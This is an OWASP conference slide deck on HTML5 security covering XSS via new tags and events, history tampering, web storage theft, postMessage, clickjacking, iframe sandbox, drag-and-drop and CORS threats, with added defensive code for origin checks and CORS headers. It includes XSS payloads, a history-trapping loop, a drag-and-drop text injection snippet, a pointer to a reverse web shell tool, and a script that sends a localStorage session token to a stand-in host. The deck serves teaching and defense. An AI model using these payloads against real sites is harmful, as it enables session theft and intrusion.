The OWASP Foundation
              http://www.owasp.org




             Krishna Chaitanya T
                 www.novogeek.com


HTML5 Security
HTML5-Quick Intro
• 5th revision of the HTML standard.
•   It’s not one big thing.
•   Set of features, technologies & APIs
•   Responsive, interactive, stunning, secure
•   Don’t need to throw anything away.
•   It already works and here to stay!


HTML5-Features
•   New structural & semantic tags
•   Several new elements & attributes
•   Multimedia and Graphics
•   Client side storage, drag/drop
•   Web messaging, CORS, web sockets
•   and a ton! http://slides.html5rocks.com

What about security?
• HTML5 was designed with considerable attention
    to security.
•   The specs by themselves aren't seriously flawed.
•   Careless code, however, turns the new features into a nest of new vulnerabilities.
•   Brings several complex attack scenarios.
•   Increases the client-side attack surface: new elements,
    attributes, events and APIs that can inject or execute script.


Anything problematic?
•   Hijacking forms made easy
•   Stealing focus & key strokes
•   Form/History Tampering
•   UI redressing vectors
•   Cross origin Attacks
•   and many more..


Few new attack vectors
• XSS via formaction // User interaction required: fires when the button is clicked; a button-level formaction overrides the form's own action
    <form id="test" /><button form="test" formaction="javascript:alert(1)">

•   Self-executing focus event via autofocus // No user interaction required: the element gets focus on page load and onfocus fires
      <input onfocus="write(1)" autofocus>

•   JavaScript execution via <VIDEO> and <SOURCE> tags // No user interaction required: a <source> that fails to load fires onerror

      <video><source onerror="javascript:alert(1)">

•   Form surveillance // onforminput/onformchange existed in early HTML5 drafts and were later dropped from the spec; current browsers do not fire them

      <form id=test onforminput=alert(1)><input></form>
      <button form=test onformchange=alert(2)>




History tampering
• Then - history.go(), .forward(), .back()
• Now – history.pushState(data, title, [url])
  history.replaceState(data, title, [url])
• Overflowing the user's history, so the Back button never leaves the attacker's page
   for (i = 0; i < 50; i++) {
         history.pushState({}, "", "/youAreTrapped.html"); }


• URL spoofing: the address bar shows whatever path the page pushes.
  The url must be same-origin, so the host cannot be faked, but a
  plausible path on a site the user already trusts can be.
• Redirection to infected sites
Web Storage
• Solves the restrictions of cookies
    (size limit, sent along with every request etc.)
•   2 types - Local storage & Session storage
•   Local storage is persistent with no expiry, unlike cookies;
    session storage lives only as long as the tab/window
•   ~5MB storage space per origin
•   Isolation of storage objects is based on
    origin, nothing finer

Web storage-threat
• Any XSS flaw in the website can read,
   write and tamper stored data! There is no
   HttpOnly equivalent: whatever sits in Web
   Storage is always reachable from script.
 <script>
 // Exfiltrate the stored session token via an image request
 document.write("<img src='http://a.com?sessionID=" +
   localStorage.getItem('SessionID') + "'>");
 </script>


• "If you claim that 'XSS is not a big deal'
   that means you never owned something
   by using it and that's your problem not
   XSS's" - Ferruh Mavituna, Author of XSS
   Shell
Origin-The foundation
• Every talk on security of the web platform
  should mention "Origin"!
• Basic unit of isolation in the web platform
• Origin = scheme://host:port (the path is not part of it;
  the default port of the scheme is implied)
• Ex: http://bing.com, http://localhost:81/,
  https://icicibank.com are three distinct origins



Same-Origin-Policy
• Browsers allow one document to access
   another only if both are from the "same origin"
   (any exceptions? yes: loading cross-origin <script>
   and <img>, submitting forms and navigating frames
   are still allowed, which is what the attacks below build on)
• Privileges within an origin
  • Full network access (XMLHttpRequest to the own origin)
  • Read/Write access to the DOM
  • Storage (cookies, Web Storage)

“SOP-Prevents useful things. Allows dangerous things”-
Douglas Crockford

Script Isolation
• Restricting JavaScript to a subset
• Object-capability security model
  • Idea: If an object in JavaScript has no reference to
    “XMLHttpRequest” object, an AJAX call cannot be made.

• Popular JavaScript subsets:
  • Caja (iGoogle), FBJS (Facebook), ADsafe (Yahoo)

• Learning curve, usability issues



Isolation with Frames
• Separate security context for each origin
• Less interactive than JS approach
• Comply with SOP
• Beware! Frames can be navigated to different
  origins using JavaScript!
• Frame navigation is NOT the same as SOP!



Frame Navigation Policies
(diagram in the original; the four policies shown, from most to least permissive)
• Permissive - any frame may navigate any other frame
• Window - a frame may navigate any frame in the same top-level window
• Descendant - a frame may navigate only frames it contains (its descendants)
• Child - a frame may navigate only its direct children
HTML5 Cross Document Messaging

 • Cross-origin client side communication
 • Network-like channel between frames
 • Securely abstracts multiple principals
 • Frames can integrate widgets (in
   mashups) with improved trust!


Messaging API-Beware of origin & framing!
// Posting a message to a cross-domain partner: always name the target
// origin. With "*" the message is delivered to whatever page occupies
// the frame, including one the attacker has navigated it to.
frames[0].postMessage("Hello Partner!", "http://localhost:81/");

// Retrieving the message on the receiving side: compare e.origin exactly
// against the expected origin before touching e.data
window.onmessage = function (e) {
      if (e.origin == 'http://localhost') {
          // sanitize and accept data
      }
};
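The origin check above is where most postMessage bugs live. The block below is an added example (not from the slides) showing a receiver that enforces an exact allowlist next to the loose substring check it replaces, plus the sending side naming its target origin. The partner origins follow the slide (http://localhost and http://localhost:81); the lookalike origin, the message format with an `action` field and the event objects are constructed for illustration so the handler can be exercised under Node without a browser.

```javascript
// Added example, not from the slides: window.onmessage with an exact
// origin allowlist, contrasted with a substring check.

// Assumed partner origins (hypothetical), matching the slide's two sides.
const ALLOWED_ORIGINS = ['http://localhost', 'http://localhost:81'];

// Weak check: substring match. 'http://localhost.attacker.example' passes.
function weakOriginCheck(origin) {
  return origin.indexOf('http://localhost') !== -1;
}

// Strict check: exact string match against a fixed allowlist. A sandboxed
// frame without allow-same-origin reports origin 'null', which also fails.
function strictOriginCheck(origin) {
  return ALLOWED_ORIGINS.includes(origin);
}

// Build a handler in the shape of window.onmessage. It returns the
// accepted message object, or null when the event is rejected, so the
// decision can be checked without a browser.
function makeMessageHandler(isTrustedOrigin) {
  return function onmessage(e) {
    if (!isTrustedOrigin(e.origin)) return null;
    // Treat e.data as data: parse it, never eval() it or write it to innerHTML.
    let msg;
    try {
      msg = JSON.parse(e.data);
    } catch (err) {
      return null;
    }
    if (msg === null || typeof msg !== 'object' || typeof msg.action !== 'string') return null;
    return msg;
  };
}

// Sending side: name the recipient's origin. With '*' the message would be
// delivered to whatever page currently occupies the frame.
function postToPartner(frame, payload) {
  frame.postMessage(JSON.stringify(payload), 'http://localhost:81');
}

// Constructed events standing in for what the browser would deliver.
const fromPartner = { origin: 'http://localhost', data: '{"action":"resize","height":300}' };
const fromLookalike = { origin: 'http://localhost.attacker.example', data: '{"action":"resize","height":300}' };
const fromSandboxed = { origin: 'null', data: '{"action":"resize","height":300}' };
const garbage = { origin: 'http://localhost', data: '<img src=x onerror=alert(1)>' };

const weakHandler = makeMessageHandler(weakOriginCheck);
const strictHandler = makeMessageHandler(strictOriginCheck);
```

The lookalike event is accepted by `weakHandler` and rejected by `strictHandler`; the sandboxed and malformed events are rejected by the strict handler even though one of them carries a trusted origin, because the payload is validated as structured data rather than used as markup.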




Demo
Cross Domain Messaging-
Recursive Mashup Attack
AJAX, Cross Document Messaging & CORS
(diagram in the original comparing the three channels: AJAX, Messaging, CORS)
Clickjacking!




JS Defense - Frame Busting

if (top != self) {                 // condition: are we inside a frame?
   top.location = self.location;   // counter action: replace the framing page with ourselves
}
// Caveat: the framed page must be allowed to run script and to navigate
// top for this to work; an attacker who frames it with the HTML5 sandbox
// attribute (next slides) or uses one of the other known frame-busting
// bypasses neutralises it. The X-Frame-Options response header is the
// defense that does not depend on script running inside the frame.


Demo
Clickjacking with CSS & JS
HTML5 Iframe Sandbox
• Very important security feature!
• The "sandbox" attribute disables form
  submissions, scripts, top window
  navigation, popups etc., and puts the content
  in a unique (opaque) origin
  <iframe sandbox src="http://remoteSite.com"></iframe>


• Can be relaxed with a few tokens
  <iframe sandbox="allow-forms allow-scripts allow-same-origin allow-top-navigation" src="http://remoteSite.com"></iframe>



Sandbox-problems
• Disables JS based frame busting defenses (no script
  runs, and top navigation is blocked unless allowed)
• allow-scripts and allow-same-origin
  should not be used together when the
  embedded page has the same origin as the
  page containing the iframe!
• That combination lets the framed script reach the
  parent's DOM and remove the sandbox attribute altogether!


Demo
       a) Sandbox disabling frame busters
b) Allow-same-origin, allow-scripts combination
HTML5 Drag/Drop
• Enhances User Experience
• Allows text injection into remote sites, provided the
  victim is tricked into dragging: the payload lands in
  whatever input the drop ends on
• draggable="true" and the "ondragstart" event
  can be used to drag malicious text into
  remote iframes!
  <div draggable="true"
  ondragstart="event.dataTransfer.setData('text/plain','malicious code');">
  <h1>Drop me</h1> </div>
  <iframe src="http://www.example.org/dropHere.html"></iframe>


Demo
 “Alphabet-Hero” built by @kkotowicz
http://attacker.kotowicz.net/alphabet-hero/game.html
CORS
• Allows cross-origin calls (which plain
  XMLHttpRequest does not permit) under careful restrictions.
• The "Access-Control-Allow-Origin" response
  header must be set by the remote site; the browser enforces it.
• Simple requests (GET, POST, HEAD with standard headers) are sent
  straight away; the browser only withholds the response.
• Other methods (PUT, DELETE) or custom headers trigger a
  preflight OPTIONS request first.
• Wildcard "*" allows any origin, but cannot be combined with
  credentials (cookies), so it only fits public data.

CORS-Threats
• Shared hosting sites should be careful!
    http://A.com/user1 and http://A.com/user2
    belong to the same origin, so a grant to A.com
    covers every tenant on it
•   Accessing internal servers through a victim's browser
•   Scanning the internal network
•   Establishing a remote shell
•   Rogue CORS requests and DDoS attacks
•   Misplaced trust (reflecting any Origin, or "*" on authenticated data)
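The two CORS slides above describe the mechanics (simple vs. preflighted requests, the wildcard) and the "misplaced trust" failure. The block below is an added example (not from the slides) that puts both in code: a check for whether a request is "simple", the origin-reflecting policy that makes any site able to read authenticated responses, and the allowlisted policy that replaces it. The partner and attacker origins, the request objects and the allowed methods/headers are constructed for illustration; the functions are pure so they run under Node without a server.

```javascript
// Added example, not from the slides: deciding CORS response headers.

// Assumed allowlist of partner origins (hypothetical).
const ALLOWED_ORIGINS = new Set(['https://app.example', 'http://localhost:81']);

// Requests the browser sends without a preflight ("simple" requests).
const SIMPLE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SIMPLE_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
const SIMPLE_CONTENT_TYPES = new Set(['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain']);

// `headers` are the ones the page's script sets itself (the browser adds
// Origin and friends on its own). Returns true if no preflight is needed.
function isSimpleRequest(method, headers) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(headers)) {
    const n = name.toLowerCase();
    if (!SIMPLE_HEADERS.has(n)) return false;
    if (n === 'content-type' &&
        !SIMPLE_CONTENT_TYPES.has(value.split(';')[0].trim().toLowerCase())) return false;
  }
  return true;
}

// Wrong: echo whatever Origin arrives and allow credentials. The browser
// then lets any site read responses carrying the victim's cookies.
function reflectingCors(req) {
  return {
    'Access-Control-Allow-Origin': req.headers.origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Right for public, unauthenticated data: wildcard with no credentials.
// Browsers refuse '*' combined with Allow-Credentials: true.
function publicCors() {
  return { 'Access-Control-Allow-Origin': '*' };
}

// Right for authenticated APIs: exact allowlist, credentials only for
// allowlisted origins, and Vary so a cache never hands one origin's
// headers to another. An empty object means "no CORS headers", which
// makes the browser block the cross-origin read.
function allowlistCors(req) {
  const origin = req.headers.origin;
  if (origin === undefined || !ALLOWED_ORIGINS.has(origin)) return {};
  const h = {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
  if (req.method === 'OPTIONS') {           // preflight for PUT/DELETE/custom headers
    h['Access-Control-Allow-Methods'] = 'GET, POST, PUT, DELETE';
    h['Access-Control-Allow-Headers'] = 'Content-Type, X-Requested-With';
    h['Access-Control-Max-Age'] = '600';
  }
  return h;
}

// Constructed requests standing in for what a browser would send.
const fromPartner  = { method: 'GET', headers: { origin: 'https://app.example' } };
const fromAttacker = { method: 'GET', headers: { origin: 'https://evil.example' } };
const preflight    = { method: 'OPTIONS', headers: { origin: 'https://app.example',
                       'access-control-request-method': 'PUT' } };
```

Note that `isSimpleRequest` says nothing about whether the request is *safe*: a simple POST still reaches the server with the victim's cookies, which is why the server-side policy, not the preflight, is what protects an authenticated API.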
SOTF-Reverse Web Shell
(diagram in the original: malicious JavaScript injected via an XSS hole
keeps the victim's browser talking to the attacker, so the hijacked
sessions are available to the attacker)
CORS-Accessing intranet apps
(image: Compass Security)
Demo
a) “Shell of the future” built by @lavakumark
     http://www.andlabs.org/tools/sotf/sotf.html

        b) Accessing internal servers
Questions?


      www.novogeek.com

      Twitter: @novogeek




References
• Stanford Security Research Lab: http://seclab.stanford.edu/websec/
• Dive into HTML5: http://diveintohtml5.info
• HTML5 Security cheatsheet: http://heideri.ch/jso/
• HTML5 Security: http://html5security.org
• Compass Security
• LavaKumar Kuppan: http://blog.andlabs.org/
• Krzysztof Kotowicz: http://blog.kotowicz.net
